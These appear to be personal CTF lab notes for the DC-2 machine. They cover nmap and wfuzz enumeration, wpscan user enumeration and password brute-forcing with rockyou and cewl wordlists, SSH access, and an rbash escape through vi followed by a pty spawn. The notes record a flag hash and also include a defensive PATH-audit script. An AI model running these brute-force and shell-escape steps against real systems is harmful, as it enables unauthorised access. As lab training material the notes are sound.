DC-2
nmap -sCV -p- -A --min-rate 10000 192.168.116.194

Add host entry in /etc/hosts
wpscan --url http://dc-2/ --enumerate p,u,t --plugins-detection aggressive
p - plugins
t - themes
u - users

Brute-force the enumerated users' passwords using rockyou
wpscan --url http://dc-2/ -U users.txt -P /usr/share/wordlists/rockyou.txt
cewl http://dc-2/ >passwordlist.txt

wpscan --url http://dc-2/ -U users.txt -P passwordlist.txt
Note: to build a site-specific password list with cewl (for cases where generic wordlists fail), use the command below
cewl http://dc-2/ >passwordlist.txt

/usr/bin/git
# cat proof.txt
0fa8d66033a87fd21c4bf2f7c8ba7eb3
Burpsuite - Exploit
cat /etc/shells
How to change the shell permanently
man chsh
https://drive.google.com/drive/u/1/folders/1RgES3dmF-5xvNU1dp--CJM-GAc1hN7Ro
Manual inspection
WordPress site - use wpscan
Note: Flag1 - Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.
cewl http://dc-2/ >passwordlist.txt
Directory brute-forcing
wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-files.txt --hc 404 http://$IP/FUZZ
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.116.194:80/FUZZ/

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000020: 301 9 L 28 W 321 Ch "wp-admin"
000000013: 301 9 L 28 W 323 Ch "wp-content"
000000025: 301 9 L 28 W 324 Ch "wp-includes"
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 http://192.168.116.194:80/FUZZ

000000005: 405 0 L 6 W 42 Ch "xmlrpc.php"
000000001: 200 306 L 3902 W 53562 Ch "index.php"
000000036: 200 62 L 167 W 2165 Ch "wp-login.php"
000000130: 200 98 L 844 W 7413 Ch "readme.html"
000000206: 200 385 L 3179 W 19935 Ch "license.txt"
000000263: 200 0 L 0 W 0 Ch "wp-config.php"
000000297: 200 4 L 15 W 135 Ch "wp-trackback.php"
000000379: 301 0 L 0 W 0 Ch "."
000000377: 500 0 L 0 W 0 Ch "wp-settings.php"
000000413: 200 0 L 0 W 0 Ch "wp-cron.php"
000000399: 403 124 L 348 W 3444 Ch "wp-mail.php"
000000462: 200 10 L 21 W 215 Ch "wp-links-opml.php"
000000448: 200 0 L 0 W 0 Ch "wp-blog-header.php"
000000838: 200 0 L 0 W 0 Ch "wp-load.php"
000001073: 302 0 L 0 W 0 Ch "wp-signup.php"
000001507: 302 0 L 0 W 0 Ch "wp-activate.php"
WPSCAN - wp-admin
Default WordPress Credentials(admin/admin)
Authentication Bypass
SQL Injection
Brute Forcing - Hydra/wfuzz(password reuse/custom payload lists)
Username enumeration via login error messages

wpscan
wpscan --url http://dc-2/ --disable-tls-checks --enumerate p --enumerate t --enumerate u
wpscan --url http://dc-2/ --disable-tls-checks --enumerate p,t,u


We will create our own wordlist from the site's content
cewl <siteaddress> -m 5 -w $PWD/cewl.txt 2>/dev/null
cewl http://dc-2/ -m 5 -w $PWD/cewl.txt 2>/dev/null


Now brute-force the logins with wpscan
wpscan --url http://dc-2/ --disable-tls-checks -U users.txt -P cewl.txt


Now SSH in as tom (SSH listens on port 7744)
ssh tom@$IP -p 7744
ssh [email protected] -p 7744


How to get around the rbash restriction (clear: command not found)
Tried a pty shell - not working:
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/bash -i - not working
bash -i - not working
clear - not working
We will use vi and set the shell variable inside it:
:set shell=/bin/bash and hit enter

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ ls /tom/usr/bin
ls: cannot access /tom/usr/bin: No such file or directory
tom@DC-2:~$ ls /home/tom/usr/bin
less ls scp vi
tom@DC-2:~$

You will be dropped out of vi and shell commands will now work.
Next, fix PATH and export TERM:
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
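The rbash restriction above rests entirely on the handful of binaries in /home/tom/usr/bin, and vi alone is enough to leave it. The following is an added audit helper, not part of the original notes, that a defender can point at a restricted user's PATH directory to flag such binaries; the ESCAPE_CAPABLE list is an assumption of this example (vi/vim, as the notes show), not a complete catalogue, and the sample directory is constructed from the `ls` output above.

```shell
#!/bin/sh
# Added audit helper (not from the original notes): report binaries in an
# rbash user's PATH directory that can spawn an unrestricted shell.
# Assumption: the list below covers only what the notes demonstrate (vi);
# extend it with whatever your own hardening baseline forbids.
ESCAPE_CAPABLE="vi vim"

# Build a constructed copy of /home/tom/usr/bin as seen in the notes
# (less ls scp vi) so the audit can be exercised offline.
make_sample_bindir() {
    dir=$(mktemp -d)
    for f in less ls scp vi; do
        : > "$dir/$f"
        chmod +x "$dir/$f"
    done
    printf '%s\n' "$dir"
}

# Print one RISK line per escape-capable binary found in $1.
# Returns 0 when the directory is clean, 1 when anything was flagged.
audit_rbash_path() {
    bindir=$1
    found=0
    for f in $ESCAPE_CAPABLE; do
        if [ -x "$bindir/$f" ]; then
            printf 'RISK: %s/%s can spawn an unrestricted shell\n' "$bindir" "$f"
            found=1
        fi
    done
    return $found
}

# Number of flagged binaries in $1 (handy for scripting a pass/fail gate).
count_risky() {
    audit_rbash_path "$1" | wc -l | tr -d ' '
}
```

On the box itself, `audit_rbash_path /home/tom/usr/bin` reproduces the finding; removing vi from that directory (or replacing the restricted shell with a dedicated jailed account) is the fix.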
Compilation capabilities
tom@DC-2:~$ which gcc
/usr/bin/gcc
tom@DC-2:~$ which cc
/usr/bin/cc
tom@DC-2:~$ which python
/usr/bin/python
tom@DC-2:~$ which perl
/usr/bin/perl
tom@DC-2:~$

gcc? - yes
cc? - yes
python? - yes
perl? - yes
uname -a
tom@DC-2:~$ uname -a
Linux DC-2 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux

tom@DC-2:~$ cat /etc/*-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
tom@DC-2:~$
